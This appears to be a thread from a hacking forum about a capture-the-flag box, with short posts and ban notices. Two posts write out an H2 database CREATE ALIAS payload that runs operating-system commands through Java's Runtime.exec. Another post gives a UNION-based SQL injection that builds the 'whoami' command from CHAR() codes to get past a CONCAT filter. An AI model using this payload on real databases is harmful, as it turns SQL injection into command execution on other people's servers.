[trevor69000]

flag

Hidden Content

You must register or login to view this content.

[test888]

Will be interesting

[Steward]

you should better explain how to bypass filter for $$ and CONCAT instead of just flag

[mazafaka555]

you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a `$`

CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';

[bananoname]

Will be interesting

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content

[mrranger2424]

flag

do you have a walkthrough for this ?

[LukaXYZ]

Thanks for sharing!!!!!!!!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[3lyly0]

how can i turn the SQLi into  a way to get the flag

[Art10n]

Using the alias created to read files in OS

[0xhdfg]

you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`

CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';

How can I then use the alias? I'm trying something like: 

SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -

to bypass CONCAT but I don't get it to work :/